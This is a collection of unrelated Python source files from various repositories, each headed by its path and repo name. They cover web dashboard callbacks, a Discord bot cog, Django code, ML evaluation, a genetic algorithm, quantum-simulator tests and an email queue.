    Output('frame-start', 'value'),
    Output('frame-end', 'value'),
    Input('frame-slider', 'value'),
    Input('frame-start', 'value'),
    Input('frame-end', 'value'))
def callback(slider_value, frame_start, frame_end):
    """Keep the range slider and the start/end number inputs in sync,
    driven by whichever of the three controls the user edited last."""
    ctx = callback_context
    trigger = ctx.triggered[0]
    value = trigger['value']
    if not value:
        raise PreventUpdate
    else:
        # The component id before the '.' tells us which input fired.
        trigger_id = trigger["prop_id"].split(".")[0]
        if trigger_id == 'frame-slider':
            slider_value = value
        elif trigger_id == 'frame-start':
            slider_value[0] = value
        elif trigger_id == 'frame-end':
            slider_value[1] = value
    # Normalise so start <= end regardless of which control moved.
    frame_start = min(slider_value)
    frame_end = max(slider_value)
    slider_value = frame_start, frame_end
    return slider_value, frame_start, frame_end
@app.callback(Output('watch-view-graph', 'figure'),
              Input('frame-end', 'value'))
def replay_view_graph_frame(frame_end):
    '''Redraw the bird's-eye view for the frame selected as the range end.'''
    if len(stream)==0:
        raise PreventUpdate
    frame = stream[frame_end]
    canvas = Canvas()
    # One Shape per detected-object record in this frame.
    shapes = [Shape(**shape) for shape in frame.to_dict('records')]
    shapes = [canvas.to_shape(*shape.view) for shape in shapes]
    canvas.view.update_layout(shapes=shapes)
    canvas.update_base()
    return canvas.view
@app.callback(Output('watch-memory-output', 'data'),
              Input('frame-start', 'value'),
              Input('frame-end', 'value'),
              Input('watch-memory-class', 'value'))
def store_frame(frame_start, frame_end, class_selected):
    """Cache records of the selected class over the chosen frame range."""
    if frame_start == frame_end or len(stream)==0:
        raise PreventUpdate
    # The end index is inclusive in the UI, hence the +1.
    df = stream[frame_start:frame_end+1]
    filtered = df[df['class_name'] == class_selected]
    return filtered.to_dict('records')
@app.callback(Output('watch-feature-graph', 'figure'),
              Input('watch-memory-output', 'data'))
def on_data_set_graph(data):
    """Plot the cached frame records as the feature graph."""
    if data is None or len(stream)==0:
        raise PreventUpdate
    filtered = pd.DataFrame.from_records(data)
    fig = plot_frame(filtered)
    return fig
| 2,396 |
main.py
|
Sbenaventebravo/EjemploSwapi
| 0 |
2023608
|
from src.conexion import obtener_personajes, obtener_naves
from src.manupulacion import cantidad_de_personajes
from src.render import imprimir_catidad_de_personajes
if __name__ == "__main__":
personajes = obtener_naves()
cantidad = cantidad_de_personajes(personajes)
imprimir_catidad_de_personajes(cantidad)
| 320 |
lessons/2/tictactoe.py
|
joshuahaertel/tictactoe
| 0 |
2023514
|
from .grid import Grid
class TicTacToe:
    """Minimal game shell that owns a Grid and can start a session."""

    def __init__(self):
        # The board state lives in a dedicated Grid object.
        self.grid = Grid()

    def play(self):
        """Run the game (placeholder: just announces the session)."""
        print('play!')
if __name__ == '__main__':
    # Allow running this module directly for a quick manual game.
    TicTacToe().play()
| 189 |
code/199.Binary-Tree-Right-Side-View.py
|
Aden-Q/leetcode
| 1 |
2024166
|
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
from collections import deque
class Solution:
    def rightSideView(self, root: Optional[TreeNode]) -> List[int]:
        """Return the values visible from the right: the rightmost node of
        each level, top to bottom (iterative level-order traversal)."""
        view = []
        if not root:
            return view
        level = deque([root])
        while level:
            # The rightmost node of the current level sits at the queue's tail.
            view.append(level[-1].val)
            for _ in range(len(level)):
                current = level.popleft()
                if current.left:
                    level.append(current.left)
                if current.right:
                    level.append(current.right)
        return view
| 755 |
queuebot/cogs/playing_status.py
|
ThaTiemsz/queuebot
| 11 |
2024007
|
import random
import discord
from discord.ext import tasks
from queuebot.cog import Cog
STATUSES = [
(discord.ActivityType.watching, '#submissions'),
(discord.ActivityType.watching, 'blobs as they come in'),
(discord.ActivityType.playing, 'with blobs'),
(discord.ActivityType.listening, 'blob radio')
]
class PlayingStatus(Cog):
    """Cog that rotates the bot's presence through STATUSES once an hour."""
    def __init__(self, bot):
        super().__init__(bot)
        # Kick off the hourly presence rotation as soon as the cog loads.
        self.activity_changer.start()
    def cog_unload(self):
        # Stop the background loop when the cog is removed.
        self.activity_changer.cancel()
    def generate_activity(self):
        """Generate a random :class:`discord.Activity`."""
        activity_type, format_string = random.choice(STATUSES)
        return discord.Activity(type=activity_type, name=format_string)
    @tasks.loop(hours=1)
    async def activity_changer(self):
        """Change the bot's presence to a random activity."""
        activity = self.generate_activity()
        await self.bot.change_presence(activity=activity)
    @activity_changer.before_loop
    async def before_activity(self):
        # Presence updates fail before the gateway session is ready.
        await self.bot.wait_until_ready()
def setup(bot):
    """discord.py extension entry point: attach the cog to *bot*."""
    cog = PlayingStatus(bot)
    bot.add_cog(cog)
| 1,140 |
clispy/callcc.py
|
takahish/lispy
| 4 |
2024615
|
# Copyright 2019 <NAME>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from clispy.type import Cons, Null
class CallCC(object):
    """call-with-current-continuation via the classic exception trick.

    A private RuntimeWarning instance (the "ball") is raised by the escape
    procedure and caught here, so invoking the continuation unwinds the
    stack straight back to this call site with the supplied return value.
    """
    def __init__(self, proc):
        from clispy.python import PyObject
        # The ball is unique per CallCC so nested call/cc's don't collide.
        self.ball = RuntimeWarning("Sorry, can't continue this continuation any longer.")
        self.ball.retval = Null()
        self.proc = proc
        # Argument list for proc: a single escape procedure (Invoke).
        self.args = Cons(PyObject(Invoke(self)), Null())
    def __call__(self, var_env, func_env, macro_env):
        try:
            return self.proc(self.args, var_env, func_env, macro_env)
        except RuntimeWarning as w:
            if w is self.ball:
                # Our own continuation was invoked: return its value.
                return self.ball.retval
            else:
                # Someone else's ball (nested call/cc): keep unwinding.
                raise w
class Invoke(object):
    """Escape procedure handed out by call/cc: calling it aborts back to
    the matching CallCC by raising that CallCC's private "ball"."""

    def __init__(self, callcc):
        # Remember which continuation we unwind to.
        self.callcc = callcc

    def __call__(self, retval):
        ball = self.callcc.ball
        ball.retval = retval
        raise ball
| 1,489 |
proposalsite/search/templatetags/custom_tags.py
|
pyconjp/proposal.search.2020
| 0 |
2024299
|
from django import template
register = template.Library()
@register.simple_tag
def add_query_to_request(request, field, value):
    """Return the request's query string with *field* set to *value*."""
    params = request.GET.copy()
    params[field] = value
    return params.urlencode()
@register.filter(is_safe=True)
def parse_search_parameter(query_dict, key):
    """Look up *key* in *query_dict*, mapping a missing or falsy value to ""."""
    value = query_dict.get(key)
    if value:
        return value
    return ""
| 369 |
src/evaluate.py
|
nidolow/image-classification
| 1 |
2022897
|
import os
import json
import numpy as np
from optparse import OptionParser
from models import generate_model
from train import get_train_data_frames, generate_data_flow
def evaluate(model_path, data_path):
    """
    Evaluates given model with test set separated from all training data.
    Gives details about accuracy for every class. Outputs results on screen.
    Args:
        model_path (str): path to model file
        data_path (str): training data directory
    """
    # Model hyper-parameters are stored next to the weights as <name>.conf
    with open(os.path.splitext(model_path)[0] + '.conf') as json_read:
        config = json.load(json_read)
    _, _, test_df = get_train_data_frames(data_path)
    test_data = generate_data_flow(test_df, config, data_path, shuffle=False)
    model = generate_model(config)
    model.load_weights(model_path)
    predictions = model.predict(test_data, steps=np.ceil(len(test_df) / config['batch']))
    # Collapse class probabilities to the predicted class index.
    predictions = np.array(np.argmax(predictions, axis=-1))
    # Map category names to the integer labels used by the data generator.
    test_df['labels'] = test_df['category'].replace(test_data.class_indices)
    labels = np.array(test_df['labels'])
    labels_len = len(np.array(test_df['labels']))
    print('\nModel:', model_path)
    print('Total accuracy:', sum(predictions == labels) / labels_len)
    # Per-class accuracy: correct predictions of class v over all of class v.
    for k in test_data.class_indices:
        v = test_data.class_indices[k]
        print(k, 'accuracy')
        print(sum((predictions == labels) & (labels == v)) / sum((labels == v)))
    print('')
def main():
    """Parse CLI options and evaluate one model or every model in a directory."""
    parser = OptionParser()
    parser.add_option('-m', '--model_path', dest='model_path', help='model to load')
    parser.add_option('-d', '--models_dir', dest='models_dir', help='path to directory with models')
    parser.add_option('--data_path', dest='data_path', default='data/train/',
                      help='path to training files directory')
    options, _ = parser.parse_args()
    if not (options.model_path or options.models_dir):
        parser.error('Requires option -m or -d.')
    if options.model_path:
        evaluate(options.model_path, options.data_path)
    if options.models_dir:
        # Every "*.mdl.index" file in the directory marks a saved model.
        for file_path in os.listdir(options.models_dir):
            root, ext = os.path.splitext(file_path)
            if ext == '.index' and os.path.splitext(root)[-1] == '.mdl':
                evaluate(os.path.join(options.models_dir, root), options.data_path)


if __name__ == '__main__':
    main()
| 2,376 |
Django/dojo_ninjas/apps/first_app/migrations/0001_initial.py
|
justnclrk/Python
| 0 |
2024001
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-02-22 06:22
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema: Dojo and Ninja tables plus the Dojo->Ninja FK.

    NOTE(review): auto-generated by Django — the 'student' FK living on
    Dojo (related_name='Dojos') looks inverted for a dojo/student relation;
    verify against the models before hand-editing.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Dojo',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('city', models.CharField(max_length=255)),
                ('state', models.CharField(max_length=255)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
            ],
        ),
        migrations.CreateModel(
            name='Ninja',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=255)),
                ('last_name', models.CharField(max_length=255)),
                ('state', models.CharField(max_length=255)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
            ],
        ),
        migrations.AddField(
            model_name='dojo',
            name='student',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='Dojos', to='first_app.Ninja'),
        ),
    ]
| 1,625 |
Chapter08/ch8/exceptions/multiple.except.py
|
puelloc/Learn-Python-Programming-Second-Edition
| 55 |
2024049
|
# This is not a valid Python module - Don't run it.
try:
    # some code
except Exception1:
    # react to Exception1
except (Exception2, Exception3):
    # react to Exception2 or Exception3 (one handler catches either type)
except Exception4:
    # react to Exception4
    ...
| 241 |
hypergan/losses/category_loss.py
|
jimimased/HyperGAN
| 0 |
2022761
|
def config():
    """Return a random hyperchamber configuration for the category loss.

    NOTE(review): depends on a module-level `hc` (hyperchamber) that is not
    imported in this file — confirm the intended import.
    """
    selector = hc.Selector()
    selector.set('discriminator', None)
    selector.set('create', create)
    return selector.random_config()
def create(config, gan):
    """Attach the category loss to the generator/discriminator losses.

    NOTE(review): this body references names that are not defined in this
    module (linear, d_last_layer, batch_norm, categories, g_losses,
    d_losses) — it appears to expect them in an enclosing scope; confirm
    before use.
    """
    category_layer = linear(d_last_layer, sum(config['categories']), 'v_categories',stddev=0.15)
    category_layer = batch_norm(config['batch_size'], name='v_cat_loss')(category_layer)
    category_layer = config['generator.activation'](category_layer)
    categories_l = categories_loss(categories, category_layer, config['batch_size'])
    # Both networks are pushed toward higher mutual information (negative loss).
    g_losses.append(-1*config['categories_lambda']*categories_l)
    d_losses.append(-1*config['categories_lambda']*categories_l)
def split_categories(layer, batch_size, categories):
    """Slice *layer* column-wise into one tensor per category width."""
    offset = 0
    pieces = []
    for category in categories:
        width = int(category.get_shape()[1])
        pieces.append(tf.slice(layer, [0, offset], [batch_size, width]))
        offset += width
    return pieces
def categories_loss(categories, layer, batch_size):
    """Mutual-information style loss: for each category group, the entropy
    of a uniform categorical prior minus the cross-entropy of the predicted
    softmax, summed over all groups.

    NOTE(review): relies on module-level tf / np / TINY that are not
    imported in this file — confirm the intended imports.
    """
    loss = 0
    def split(layer):
        # Same column-wise slicing as split_categories above.
        start = 0
        ret = []
        for category in categories:
            count = int(category.get_shape()[1])
            ret.append(tf.slice(layer, [0, start], [batch_size, count]))
            start += count
        return ret
    for category,layer_s in zip(categories, split(layer)):
        size = int(category.get_shape()[1])
        # Uniform prior over this group's classes.
        category_prior = tf.ones([batch_size, size])*np.float32(1./size)
        logli_prior = tf.reduce_sum(tf.log(category_prior + TINY) * category, axis=1)
        layer_softmax = tf.nn.softmax(layer_s)
        logli = tf.reduce_sum(tf.log(layer_softmax+TINY)*category, axis=1)
        disc_ent = tf.reduce_mean(-logli_prior)
        disc_cross_ent = tf.reduce_mean(-logli)
        loss += disc_ent - disc_cross_ent
    return loss
| 1,786 |
train_evolution_algorithm.py
|
gpatsiaouras/Robot-Simulator
| 0 |
2023855
|
import os
import numpy as np
import rooms
import time
from evolution import Simulator
from evolution import EvolutionaryAlgorithmPlotter
from scipy.spatial import distance
# Fitness Formula Parameters
COLLISION_PENALTY = -0.5  # negative reward applied per collision
COLLISION_WEIGHT = 0.3  # weight of the collision term in the fitness mix
GROUND_MULTIPLIER = 100  # scales ground coverage (a fraction) into points
GROUND_WEIGHT = 0.7  # weight of the coverage term in the fitness mix
# Evolutionary Algorithm
NUMBER_OF_PARENTS_MATING = 4  # elite size carried into each crossover round
ROOM_TO_USE = rooms.room_3  # map the robots are evaluated in
np.set_printoptions(precision=2)  # keep console weight dumps readable
def calculate_distance(list_vectors):
    """Return the mean pairwise Euclidean distance over *list_vectors*.

    Every ordered pair (i, j) is counted and the total is divided by n**2,
    matching the original normalisation; self-pairs are skipped (they would
    contribute 0 anyway). Replaces the original's hand-rolled 1-based
    counters with enumerate.

    Args:
        list_vectors: sequence of equal-length numeric vectors.

    Returns:
        float: sum of distances over all ordered pairs, divided by n**2.
    """
    vectors = list(list_vectors)
    total = 0.0
    for i, first in enumerate(vectors):
        for j, second in enumerate(vectors):
            if i != j:
                total += distance.euclidean(first, second)
    return total / (len(vectors) ** 2)
def run_chromosome_on_simulator(weights1, weights2, steps=-1):
    """Replay a chromosome's network weights visually on the simulator."""
    sim = Simulator(ROOM_TO_USE, max_steps=steps, autonomous=True, pygame_enabled=True)
    sim.network.weights1, sim.network.weights2 = weights1, weights2
    sim.run()
class EvolutionaryAlgorithm:
    """Evolves ANN weights (17-5-2) that drive a robot to cover a room."""
    def __init__(self, number_of_generations, robots_per_generation, exploration_steps, save_each=None):
        # Input Parameters
        self.number_of_generations = number_of_generations
        self.robots_per_generation = robots_per_generation
        self.exploration_steps = exploration_steps
        # NOTE(review): evolve() computes `generation % self.save_each`,
        # which raises TypeError when save_each is left at its None default.
        self.save_each = save_each
        # Fixed Parameters of the ANN
        self.number_of_nodes_input_layer = 17
        self.number_of_nodes_hidden_layer = 5
        self.number_of_nodes_output_layer = 2
        # Statistical data
        self.fitness_average = []
        self.fitness_maximum = []
        self.diversity = []
        # Calculating the number of genes based on the layers of the RNN used to calculate the motion
        self.number_of_genes = self.number_of_nodes_input_layer * self.number_of_nodes_hidden_layer \
            + self.number_of_nodes_hidden_layer * self.number_of_nodes_output_layer
        # Specify population size
        self.population_size = (self.robots_per_generation, self.number_of_genes)
    def weights_to_vector(self, weights1, weights2):
        """Flatten both weight matrices into one chromosome vector."""
        return np.append(weights1.flatten(), weights2.flatten())
    def vector_to_weights(self, vector):
        """Split a chromosome vector back into the two weight matrices."""
        weights_combined = np.split(vector, [
            self.number_of_genes - self.number_of_nodes_hidden_layer * self.number_of_nodes_output_layer,
            self.number_of_genes])
        return weights_combined[0].reshape(self.number_of_nodes_input_layer, self.number_of_nodes_hidden_layer), \
            weights_combined[1].reshape(self.number_of_nodes_hidden_layer, self.number_of_nodes_output_layer)
    def fitness(self, simulator):
        """Weighted mix of ground coverage (reward) and collisions (penalty)."""
        ground_coverage = simulator.env.ground_coverage
        collisions = simulator.robot.collisions
        fitness = (GROUND_WEIGHT * ground_coverage * GROUND_MULTIPLIER
                   + COLLISION_WEIGHT * collisions * COLLISION_PENALTY) / (GROUND_WEIGHT + COLLISION_WEIGHT)
        return fitness
    def select_mating_pool(self, population, fitness, number_of_parents_mating):
        """Pick the top-N chromosomes by fitness as parents.

        NOTE(review): mutates *fitness* in place (picked entries are set to
        a large negative sentinel) — callers must not reuse it afterwards.
        """
        parents = np.empty((number_of_parents_mating, population.shape[1]))
        for parent_number in range(number_of_parents_mating):
            index_of_max_fitness = np.where(fitness == np.max(fitness))
            index_of_max_fitness = index_of_max_fitness[0][0]
            parents[parent_number, :] = population[index_of_max_fitness, :]
            fitness[index_of_max_fitness] = -99999999999
        return parents
    def crossover(self, parents, offspring_shape):
        """Single-point crossover at the middle of the chromosome."""
        offspring = np.empty(offspring_shape)
        # We specify the crossover point to be at the center
        crossover_point = np.uint8(offspring_shape[1] / 2)
        for i in range(offspring_shape[0]):
            # Index of the first parent
            parent1_index = i % parents.shape[0]
            # Index of the second parent
            parent2_index = (i + 1) % parents.shape[0]
            # First half from parent 1
            offspring[i, 0:crossover_point] = parents[parent1_index, 0:crossover_point]
            # Second half from parent 2
            offspring[i, crossover_point:] = parents[parent2_index, crossover_point:]
        return offspring
    def mutation(self, crossover):
        # Mutation changes a single gene in each offspring randomly.
        # NOTE(review): only the delta is random — the mutated gene index is
        # fixed at 4; confirm whether a random index was intended.
        for index in range(crossover.shape[0]):
            # Generate a random value to add to the gene
            random_value = np.random.uniform(-5.0, 5.0, 1)
            crossover[index, 4] = crossover[index, 4] + random_value
        return crossover
    def evolve(self, start_population=None, start_gen=0):
        """Run the GA loop; returns the best (weights1, weights2) found."""
        if start_population is None:
            population = np.random.uniform(low=-5.0, high=5.0, size=self.population_size)
        else:
            population = start_population
        simulator = Simulator(ROOM_TO_USE, self.exploration_steps, autonomous=True, pygame_enabled=False)
        for generation in range(start_gen, self.number_of_generations):
            start = time.time()
            print("\nGeneration {0}#".format(generation))
            print("Robot running: ", end="", flush=True)
            fitness = []
            # Evaluate every chromosome on a fresh simulator run.
            for i in range(self.robots_per_generation):
                simulator.reset()
                simulator.network.weights1, simulator.network.weights2 = self.vector_to_weights(population[i])
                print(i, end=" ", flush=True)
                simulator.run()
                fitness.append(self.fitness(simulator))
            # Track diversity and fitness statistics for later plotting.
            self.diversity.append(calculate_distance(population))
            self.fitness_average.append(np.average(fitness))
            self.fitness_maximum.append(np.max(fitness))
            print("\nFitness: " + str(fitness))
            print("Max Fitness: {0:.2f}".format(np.max(fitness)))
            # Select the best parents in the population
            parents = self.select_mating_pool(population, fitness, NUMBER_OF_PARENTS_MATING)
            # Generate the next generation using crossover
            offspring_shape = (self.population_size[0] - parents.shape[0], self.number_of_genes)
            crossover = self.crossover(parents, offspring_shape)
            # Add some variations to the crossover using mutation
            mutation = self.mutation(crossover)
            population[0:parents.shape[0], :] = parents
            population[parents.shape[0]:, :] = mutation
            # Save checkpoint according to frequency requested
            # NOTE(review): crashes with TypeError when save_each is None.
            if generation % self.save_each == 0:
                self.save_checkpoint(generation, population)
            print("Time elapsed: {0}".format(time.time() - start))
            # If this is the last generation
            if generation == self.number_of_generations - 1:
                best_chromosome_index = np.where(fitness == np.max(fitness))
                # Retrieve the weights from the chromosome
                weights1, weights2 = self.vector_to_weights(population[best_chromosome_index].T)
                # Print the best weights
                print("\nBest Weights:")
                print(weights1)
                print(weights2)
                return weights1, weights2
    def save_checkpoint(self, generation, population):
        """Dump the raw population array to ckpt/gen_<n>.txt."""
        if not os.path.exists(os.path.join("ckpt")):
            os.makedirs("ckpt")
        # NOTE(review): file handle is never closed — use a with-block.
        ckpt = open("ckpt/gen_{}.txt".format(generation), "w+")
        population.tofile(ckpt)
    def evolve_checkpoint(self, ckpt_dir):
        """Resume evolution from a checkpoint file path relative to this file."""
        curr_path = os.path.dirname(os.path.abspath(__file__))
        ckpt_dir = curr_path + ckpt_dir
        ckpt = open(ckpt_dir, "r")
        population = np.fromfile(ckpt, dtype=np.float64)
        # The generation number is encoded in the filename: gen_<n>.txt
        start_gen = int(ckpt_dir.split("_").pop()[:-4])
        return self.evolve(population.reshape(self.robots_per_generation, self.number_of_genes), start_gen)
if __name__ == '__main__':
    # Initiate the evolutionary algorithm with parameters
    evolutionary_algorithm = EvolutionaryAlgorithm(
        number_of_generations=30,
        robots_per_generation=10,
        exploration_steps=2000,
        save_each=2
    )
    # Evolve from scratch (or resume from a checkpoint — see the line below).
    weights1, weights2 = evolutionary_algorithm.evolve()
    # weights1, weights2 = evolutionary_algorithm.evolve_checkpoint("/ckpt/gen_70.txt")
    # Plot Data
    plotter = EvolutionaryAlgorithmPlotter(evolutionary_algorithm)
    plotter.plot()
    # Demonstrate on the simulator by replicating the best individual weights
    run_chromosome_on_simulator(weights1, weights2)
| 8,780 |
include/test/test_config.py
|
neurodata-arxiv/blci
| 0 |
2023152
|
#!/usr/bin/env python
# Copyright 2016 neurodata (http://neurodata.io/)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# test_dependencies.py
# Created by <NAME> on 2016-11-28.
# Email: <EMAIL>
import argparse
import sys
import os
sys.path.append(os.path.abspath("../"))
from config import *
def test_valid():
    """A well-formed blci.yml validates successfully."""
    fn = "test-blci/blci.yml"
    c = config(fn, projecthome="test-blci")
    assert c.isvalid(), "Invalid configuration file '{}'".format(fn)
def test_invalid():
    """A malformed config file must fail validation."""
    fn = "config/error.yml"
    c = config(fn, projecthome="test-blci")
    assert not c.isvalid(), "Invalid configuration file '{}'".format(fn)
def test_unique():
    """unique_fn appends a numeric suffix before the file extension."""
    fn = "config/error.yml"
    c = config(fn, projecthome="config")
    sp = os.path.splitext(fn)
    assert sp[0] + "_1" + sp[1] == c.unique_fn(fn)
def test_data_dep_stub():
    """Configs loaded from different stub files must not compare equal."""
    fn = "test-blci/incomplete_blci.yml"
    c = config(fn, projecthome="test-blci")
    assert(not(c == config("config/test_incomplete.yml", projecthome="config")))
| 1,488 |
clovek_ne_jezi_se/log_handler.py
|
munichpavel/clovek-ne-jezi-se
| 0 |
2024428
|
import sys
import logging
# Shared stdout log handler: DEBUG level, timestamped single-line format.
formatter = logging.Formatter(
    '%(asctime)s:%(name)s:%(levelname)s:%(message)s'
)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
| 221 |
j5/backends/__init__.py
|
Shivam60/j5
| 0 |
2024598
|
"""Backend classes."""
from .backend import Backend, CommunicationError, Environment
__all__ = ["Backend", "CommunicationError", "Environment"]
| 146 |
tests/test_app/sa/orm/app.py
|
ckkz-it/aiohttp-rest-framework
| 7 |
2024254
|
import typing
from functools import partial
from aiohttp import web
from aiohttp_rest_framework import APP_CONFIG_KEY, create_connection
from tests.test_app.base_app import get_base_app
async def init_db(app_conn_prop: str, db_url: str, app: web.Application) -> None:
    """Open the DB connection and store it on the application object."""
    connection = await create_connection(db_url)
    app[app_conn_prop] = connection
async def close_db(app_conn_prop: str, app: web.Application) -> None:
    """Dispose the DB connection previously stored by init_db."""
    connection = app[app_conn_prop]
    await connection.dispose()
def create_application(db_url: str, rest_config: typing.Mapping = None):
    """Build the test app and wire DB startup/cleanup lifecycle hooks."""
    application = get_base_app(rest_config=rest_config)
    conn_prop = application[APP_CONFIG_KEY].app_connection_property
    application.on_startup.append(partial(init_db, conn_prop, db_url))
    application.on_cleanup.append(partial(close_db, conn_prop))
    return application
| 769 |
python/test/test_qulacs.py
|
mshrn/qulacs
| 1 |
2024376
|
# set library dir
import sys
# Treat any extra command-line arguments as additional library search
# paths, then strip them so unittest.main() below does not parse them.
for ind in range(1,len(sys.argv)):
    sys.path.append(sys.argv[ind])
sys.argv = sys.argv[:1]
import numpy as np
import unittest
import qulacs
class TestQuantumState(unittest.TestCase):
    """Checks QuantumState sizing and basis-state initialization."""

    def setUp(self):
        self.n = 4
        self.dim = 2**self.n
        self.state = qulacs.QuantumState(self.n)

    def tearDown(self):
        del self.state

    def test_state_dim(self):
        vector = self.state.get_vector()
        self.assertEqual(len(vector), self.dim, msg="check vector size")

    def test_zero_state(self):
        self.state.set_zero_state()
        vector = self.state.get_vector()
        vector_ans = np.zeros(self.dim)
        vector_ans[0] = 1.
        # Compare |difference|: the original `(vector - vector_ans) < 1e-10`
        # also passed for arbitrarily large NEGATIVE deviations.
        self.assertTrue((np.abs(vector - vector_ans) < 1e-10).all(), msg="check set_zero_state")

    def test_comp_basis(self):
        pos = 0b0101
        self.state.set_computational_basis(pos)
        vector = self.state.get_vector()
        vector_ans = np.zeros(self.dim)
        vector_ans[pos] = 1.
        # Same absolute-difference fix as above.
        self.assertTrue((np.abs(vector - vector_ans) < 1e-10).all(), msg="check set_computational_basis")
class TestQuantumCircuit(unittest.TestCase):
    """Checks circuit construction by preparing a Bell pair."""

    def setUp(self):
        self.n = 4
        self.dim = 2**self.n
        self.state = qulacs.QuantumState(self.n)
        self.circuit = qulacs.QuantumCircuit(self.n)

    def tearDown(self):
        del self.state
        del self.circuit

    def test_make_bell_state(self):
        # H on qubit 0 then CNOT(0 -> 1) yields (|00> + |11>) / sqrt(2).
        self.circuit.add_H_gate(0)
        self.circuit.add_CNOT_gate(0, 1)
        self.state.set_zero_state()
        self.circuit.update_quantum_state(self.state)
        vector = self.state.get_vector()
        vector_ans = np.zeros(self.dim)
        vector_ans[0] = np.sqrt(0.5)
        vector_ans[3] = np.sqrt(0.5)
        # Compare |difference|: the original elementwise check accepted
        # large negative errors.
        self.assertTrue((np.abs(vector - vector_ans) < 1e-10).all(), msg="check make bell state")
if __name__ == "__main__":
unittest.main()
| 1,884 |
ob2/mailer/__init__.py
|
hantaowang/ob2
| 17 |
2024609
|
import logging
import smtplib
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import make_msgid
from flask import url_for
from jinja2 import Environment, PackageLoader
from os.path import basename
from werkzeug.urls import url_unparse
import ob2.config as config
from ob2.database import DbCursor
from ob2.util.hooks import apply_filters
from ob2.util.templating import JINJA_EXPORTS
from ob2.util.resumable_queue import ResumableQueue
jinja_environment = None
app = None
def send_template(*args, **kwargs):
    """Render an email (see create_email for the arguments) and queue it
    for delivery on the background mailer thread."""
    if not config.mailer_enabled:
        raise RuntimeError("Cannot send mail while mailer is disabled")
    email_payload = create_email(*args, **kwargs)
    with DbCursor() as c:
        job = mailer_queue.create(c, "send", email_payload)
    mailer_queue.enqueue(job)
def create_email(_template_name, _to, _subject, _from=None, _attachments=None,
                 _message_id=None, **kwargs):
    """
    Prepares an email to be sent by the email queue background thread. Templates are taken from
    templates/*.html and templates/*.txt. Both a HTML and a plain text template is expected to be
    present. Parameters should be passed as keyword arguments to this function.
    _template_name
    _to
    _subject
    _from
    _attachments -- Tuples of (type, file_path) where type should be "pdf" (only pdfs are
                    supported right now)
    _message_id  -- If this message is a REPLY, then specify the message ID(s) of the
                    previous messages in this chain.
    Returns an opaque object (spoiler: it's a tuple) which should be passed directly to
    mailer_queue.enqueue().
    """
    if not config.mailer_enabled:
        raise RuntimeError("Cannot create mail while mailer is disabled")
    # Default replaced in-body: a mutable default argument ([]) is shared
    # across calls, the classic Python pitfall.
    if _attachments is None:
        _attachments = []
    if _from is None:
        _from = config.mailer_from
    msg = MIMEMultipart('alternative')
    msg['Subject'] = _subject
    msg['From'] = _from
    msg['To'] = _to
    msg['Message-Id'] = make_msgid()
    if _message_id:
        # Thread the reply under the referenced message(s).
        msg['References'] = _message_id
        msg['In-Reply-To'] = _message_id
    body_plain = render_template("%s.txt" % _template_name, **kwargs)
    body_html = render_template("%s.html" % _template_name, **kwargs)
    msg.attach(MIMEText(body_plain, 'plain', 'utf-8'))
    msg.attach(MIMEText(body_html, 'html', 'utf-8'))
    for attachment_type, attachment_path in _attachments:
        attachment_name = basename(attachment_path)
        with open(attachment_path, "rb") as attachment_file:
            attachment_bytes = attachment_file.read()
        if attachment_type == "pdf":
            attachment = MIMEApplication(attachment_bytes, _subtype="pdf")
            attachment.add_header("Content-Disposition", "attachment", filename=attachment_name)
            msg.attach(attachment)
        else:
            raise ValueError("Unsupported attachment type: %s" % attachment_type)
    return _from, _to, msg.as_string()
def get_jinja_environment():
    """Lazily build (once) and return the module-level Jinja environment."""
    global jinja_environment
    if jinja_environment is None:
        env = Environment(loader=PackageLoader("ob2.mailer", "templates"))
        env.globals.update(JINJA_EXPORTS)
        env.globals["url_for"] = url_for
        jinja_environment = env
    return jinja_environment
def render_template(template_file_name, **kwargs):
    # Renders a mailer template inside a synthetic request context so that
    # url_for() generates absolute URLs against the configured public host.
    if app is None:
        raise RuntimeError("No web application registered with mailer")
    template = get_jinja_environment().get_template(template_file_name)
    base_url = url_unparse(("https" if config.web_https else "http",
                            config.web_public_host, "/", "", ""))
    with app.test_request_context(base_url=base_url):
        return template.render(**kwargs)
def register_app(app_):
    """
    Sets the global web application `app`, for use in generating external web URLs for email
    templates. We cannot import this directly, because it creates a cyclic dependency.
    """
    global app
    # One-time initialization; a second registration is a programming error.
    if app is not None:
        raise ValueError("Mailer global app has already been initialized")
    app = app_
class MailerQueue(ResumableQueue):
    """Background queue that delivers prepared (from, to, message) email
    payloads over SMTP."""
    queue_name = "mailerqueue"
    database_table = "mailerqueue"
    def process_job(self, operation, payload):
        """
        Connects to the configured SMTP server using connect_to_smtp defined in config/algorithms
        and sends an email.
        """
